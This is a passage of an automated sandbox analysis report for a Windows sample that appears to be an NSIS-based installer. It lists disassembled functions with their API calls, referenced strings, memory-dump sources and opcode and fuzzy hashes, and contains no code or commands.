                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,756F23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID: F$A
                                                                                                                                                                                                                                                                                                          • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                                          • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                                          Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                                          • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                                          • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                                          Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,756F23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                                          • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00426176,756F23A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                                          • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                                          • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                          • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                                          Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                                                                                                                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                                          • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                          • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                                          Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                          • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                                          Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                          • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                                          Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                                          • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                                          • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                          • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                                          Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1450501469.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450465904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450582402.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450618737.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1450846284.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_HI6VIJERUn.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                                          • String ID: F$N$open
                                                                                                                                                                                                                                                                                                          • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                          • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                                          Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00406B79
